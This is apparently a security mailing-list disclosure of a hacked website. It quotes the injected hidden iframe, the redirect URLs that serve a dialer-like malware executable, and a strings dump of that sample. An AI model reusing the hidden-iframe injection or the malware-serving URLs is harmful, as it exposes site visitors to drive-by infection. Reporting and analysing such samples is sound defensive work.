Hi All, I've only looked at this for about 3 mins, so there isn't a lot to tell. From a website that looks like someone has hacked it and added a IFRAME to the top of the page: <iframe FRAMEBORDER="0" width="0" height="0" src="http://213.158.119.103/iframe.php?xid=111";></iframe> From this frame it gets bounced onto: http://62.4.84.150/data/start.php?id=111-b&aid=0 then onto: http://62.4.84.150/data/start.php?id=111-download&aid=0 which then downloads a 17984b exe file. I've attached a strings output from the exe, and a copy of the exe(password for zip is lamedial). I hope someone else can shead more light on this than I can. Cheers, Daniel B. -- Daniel Bartlett danbuk_fd@xxxxxxxxxxxx
Attachment:
lamedial.zip
Description: Zip archive
Strings v2.1
Copyright (C) 1999-2003 Mark Russinovich
Systems Internals - www.sysinternals.com
EINFO
DVCLAL
PACKAGEINFO
PARAMS
MZP
This program must be run under Win32
^B*
v[Sljs:
StringX
Y6M
TObject
!;l
LY9
% 8
$z(
PRQ:
]YZ
< v
;"u
1+5
d?H
;"u
&^w
Q782
7CF
<_1
x{H
,mu
VQA
j8V@
Ht
GnfBD
jJP
LOR<
ZHQ
jg/
Huv
6t9
DY8k5
F8a
/n3
1k[
SHY
H{n
w]j
{,!
/w)f%:
g$t
GKu
keP
-tb
+t_${//?xtZXtU0u
w%9
i}9
~ExC[)
{;
Aar
l L
xqP
m$n^
@~d
Z`B
01+O
IaY`
{e4
+Vlm
V$v<
-HtG
Vr2f
%X8
f|C
mP0T
YY.
z7T
(k{
a[C-
P<T
(9h
JLv
bB_
B7l
'e]
w(}
tG,
.{i
2E;;v
$Jj
|28u
x#t
"pNu
'#!A
okK1Ws
~$P
!R:
5^u:J
eZm
GY?O<X
A|;
t\;
{Ju
hik
uXJt
.pg`
"+8A
7t1S
P5X
w\-
r&J|
o#u
N|*
}&Z~")
'FR
LrR
"O}
2X9
{[@N~
W*Jx
L~H
+oV#
x2u
(t;
kQR
n^S
Qx|
t><
tS<
t^<
Px<
g(x
_(v
^h(<[
khL
9ly
CRaB
T'9
58vw
7 ge
8Bl
@6+u
UwUh
T \O
{]Y$
p'Q
3Z}Yu
C$3V
+-C
ceF
[sQ
]ej
O>0
8P(
viP"U
z{?
]ppC,
Z)F
U[O
F**
U+\
c)M
JO+
8|"G
g[i
O"X
BZ'
=nR
&q+E
o%Uh
/6d
<1ZYYd
o-6
/Pj@)
6~t
s/<
p&dS,
<]0]6
|4 x
7)$
($A
@[pwZ
!x]
|xt
plh2
d`\
XTP
2LHD
@<8$
(, d
\r0
TDialParams
.1:
ulDav
TConn
orhr
etersP
l 4}K
Loc
rops
EVpP5
5p95
gWindow
.>`9
k"Hw
GPa
PXY
o+w
C8X
>_R
e#0
)ig
`1'&cF\=
`Pa
V%-
`P92
hh9{
^8y
g3Up@
F)(
;''
$KW@
8'%
>dJ
%=U
K5M
Ras)
Enum
sAG
6l"
d/1X
Sstus
#90<
HangUpAp<
CDevic
v`1J
qV*idaAN
=S v
rwapi32.dll
=.{ G
->7
@4>
r S
Sr
.y S
SDz
|Fk
dUr
/*+
E<(b %
HV~2
~-\dl
F3b
8?j/
HYy
-zAY:
P>#W
m(M
p'N
{~/
CNu
5!HK
d~O*
r#SG
:\>
E;,$t
uqTYZ
CG;
H[|
D{W
x^E
+neEL
c,-k
Vq@
5`s[+
NgP1
;l1
5<C/
jd%8
l~Hr
:YvE
=raD
5(6{
5;(
jM@
/=IH
$0,
JJ4
0'N
2$$(
(hp
$$del.ba
@Echo off
begin
if exis
t %1 A
> nug
gotRC
%cf
{FFB51760-34
4E-4
B18C7AC1D6
3}.mem
_!X
F"~
0,rI1I_9k0
Wz#
pQ]
tHu
}Smt
EnK
iP,
|d\%
0IO
tPOHh
jfT
\!x
W`@0
c2"
l=[
u4E@E
,F#H:+|
v:^=
|/C
`l%Z
In.)
hBAs
SS=Q
X0Za
xa!,
m`P
DQ6d
!'3Q
mod
sqR
\ x
Bdn
z$KI
PQ\^
i44.(
-w(
P}biU
x>,
X,`
>`!&#
]6@.
k/EG
BNDUh3
;|&
){a
KUF
|y8M
;1;
`=d \U
.t&
i1z
j$X
JN0
Q)~
KD#3/
=H3
<tX
, X?
j60
?TN
j)
7D&
ZH$
2lI
~V'
8?:
!j`
}GF
hHW
F\*
4;'
%RND%h
(Th?
U0X[
H4X
jh"
'Xk
Wdw
t{oft
ware\Micros
s\Cur
ntV#
net
t"gs
0xyEnable
|Sh
\bh
g,A<%h"X
]m h
l$]
h/p\shell
Gope#
\comma
oX'
AOL.EXE
iexploD
&z/
",S
H0!
DRA
hT^#to
$?c'
^72
OG1
=<~
h`1
0K=
bIu
0c'
e*p
}?S
@$`
#KIt
o`E
Z@8
9d9
(;j
:2&k
~NR
Jj<
rtPause
Cou!%9;Y3DP
)ryV
UPr
fssw
'RL
NoM
Only;
Max
eTih/
H1:
#^<,
CNTR
'/*
Xt$
y%u
/AIIT"F+
7xr
:!g
dDm
#G`m
iX5
8V15
j"S
)G!
!8Z
"d}
A?F
[9h
@9`
tZz
![d
0g-
i0iJ~
d{\
Goc
;XtG
gle[
0p!
$p1&
MM0
u1'
<mu
%&P
Ev?
ARA
MS/
dM%
o7n
hD99
@q#
+,+
@O>n@
`W`sP
@T,
r*t
.mH8%
;9$
b.S
};}
eCE
p@a
|7Bk
;L=
@Ju
cS;
OGs
oNe
v7J
VY0
|+B
tadN
!GcBx
0^C.`
pBT
rT#?
ttwh8
;tt
TP_
.di
?a9
/o7
BUY]~
$(A
d,04
8<@D
LvPg
X\oJ>
d"&
`_%v
l@rK
#y $w(9
;U70\.d
)0{,
AxW
ypH
xcc~x
/l416
9+9
d4=
>x,
p>i
sYvn
0vC
ZpC
88QQ2
t&~
(Cc
[QT
#sI
&=O8
G.l
System
Init
.UType-
C.A
sag
uTool
(*YAPIE?
_6Oe
5uRa
Er5
jLmc
c@(
-l#
Uwk
mM#eeuE
PIPEM
D16
guh
hread
_dIN
Jo/
_=0
i=2}
DP0
9678
_=s
*GB
@,X
&u>RL=o
://62.4.8
150
/2t/
ex.php?iG
7l{
T.w
tz,$
02700431
176_47_6@n]
111dJ
H11
cpyA
WaitF
SH@
VirtuIFree
Alloc
k2K
S7ep
izvf
Z6SeWi
Atiibu
0eM
E6e
phewOf4
LoadKT
LErar
o"Sho
lAd
drp
_eIn
C0s
>RHand
UnhLd
Rtl:w
k#P
ulGA
eTP
Key
L?,
nsl
xtA
B7l
Tt1
eek
Mx-
Is~
pEch0
oy-
UppBu
^B*
y@\q
34@3
CODE
ra' `DATA
@BS
i~O
)P'e
`X|'sr&
u A
GIu
KERNEL32.DLL
advapi32.dll
oleaut32.dll
shell32.dll
user32.dll
LoadLibraryA
GetProcAddress
ExitProcess
RegCloseKey
SysFreeString
ShellExecuteA
SetTimer
dn5